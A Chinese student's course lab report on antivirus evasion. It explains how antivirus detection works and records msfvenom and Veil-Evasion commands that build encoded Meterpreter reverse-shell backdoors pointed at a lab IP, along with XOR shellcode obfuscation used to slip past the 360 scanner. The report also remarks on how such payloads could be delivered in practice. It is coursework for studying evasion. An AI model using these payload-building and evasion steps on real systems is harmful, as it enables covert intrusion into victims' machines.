20144303 石宇森 《网络对抗技术》免杀原理与实践

20144303 石宇森 《网络对抗技术》免杀原理与实践

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

1、基于特征码检测:每个程序都会有一段特征码,或者说是一段数据。杀毒软件可以检测某个程序的特征码是否包含恶意代码的特征码,以此来判定是否为恶意代码

2、启发式检测:杀毒软件检测某个程序在系统中做的事情,是不是恶意代码做的事情。以此来判断是不是恶意代码

3、基于行为的检测:也是启发式的一种,可以理解为加了监控模式的启发式检测

(2)免杀是做什么?

让恶意代码安全通过杀毒软件的检测,不被查出

(3)免杀的基本方法有哪些?

1、针对杀软基于特征码的检测方法,可以改变或者隐藏恶意代码的特征码。所以可以用到加壳或者是多次编码以改变特征码等方法

2、针对杀软启发式的检测方法,可以改变恶意代码的行为。尽量使用反弹式连接,对通讯隧道进行加密,或者是减少对系统的操作,尽量对内存进行操作。

二、实践总结与体会

通过这次亲自动手实践,掌握了恶意代码如何躲避杀毒软件和防火墙检测的方法,深刻体会到了病毒程序的恐怖。在信息化的时代,黑客们要想将病毒注入到广大用户的计算机中,就如同探囊取物一样。所以,我们还是要从根源杜绝病毒的侵入,尽量不下载来路不明的软件,不打开乱七八糟的网站。

同时,也发现了有很多杀毒软件真的没什么作用,就连我们用的最基本的恶意代码都检测不出来。好像只是来偷取用户信息的.....

三、离实战还缺什么技术或步骤

1、首先,这个实验是在两台计算机相互ping的同的基础上完成的。所以要想达到实战效果,应该先解决这个问题

2、要解决如何把恶意代码传到靶机的问题。可以把其附加在某个软件或者挂到网站上。

3、我们这样生成的恶意代码,还是会被有些杀毒软件检测到,要想完全做到免杀,还需要更加高明的办法。

四、实践过程记录

1、用msfvenom直接生成后门

方法同后门那个实践中的方法一样。

在360检测下查出了病毒:

2、使用编码器对恶意代码进行一次编码

输入指令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.75.128 LPORT=4303 -f exe > 20144303ms2.exe对恶意代码进行一次编码,生成新的恶意代码20144303ms2。

没有通过杀软的检测:

3、使用编码器对恶意代码进行十次编码

输入指令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.75.128 LPORT=4303 -f exe > 20144303ms3.exe对恶意代码编码10次,生成新的恶意代码20144303ms3。

同样也没能通过检测:

4、使用Veil-Evasion生成可执行文件

输入指令:veil-evasion打开veil-evasion

使用命令:use python/meterpreter/rev_tcp

设置IP和端口:set LHOST 192.168.75.128set LPORT 4303

进入到generate界面,输入新生成文件的名字20144303ms4,然后选择1使用phthon来编写

用Python编译一个文件(名字ms41是因为第一次进行编译时失败了,名字重复,所以它自动生成了20144303ms41)

虽然废了很大的功夫,但是也没能通过360的查杀:

5、利用shellcode编程

首先,生成一段shellcode代码

将自己生成的shellcode代码加入到老师给的程序中,编译出来一个恶意代码程序。对其进行检测。360没有检测出它是一个恶意代码。

6、对shellcode进行异或和加算法

在vc中利用两个函数对shellcode进行+1和异或操作(具体代码就不贴出来了)

生成的两段新的shellcode如下:

将其编译后生成新的恶意代码程序。用360检测都安全通过

为了比较其具体的免杀效果,我把这两个程序放到了http://www.virscan.org/上进行检测。发现异或后的恶意代码免杀效果更好一些。(很奇怪的是我在电脑上用360手动扫描,没有检测出恶意代码。但是在网站上测试的时候,显示奇虎360报出了查毒......)

基本上实现了免杀后,要对它的功能进行测试,不能进行攻击的话就相当于白做了..... 但我的恶意代码经过了实践的考验,完成了攻击。获取了win7的shell,并截取了它的屏幕

posted @ 2017-03-26 22:06  20144303石宇森  阅读(303)  评论(1编辑  收藏  举报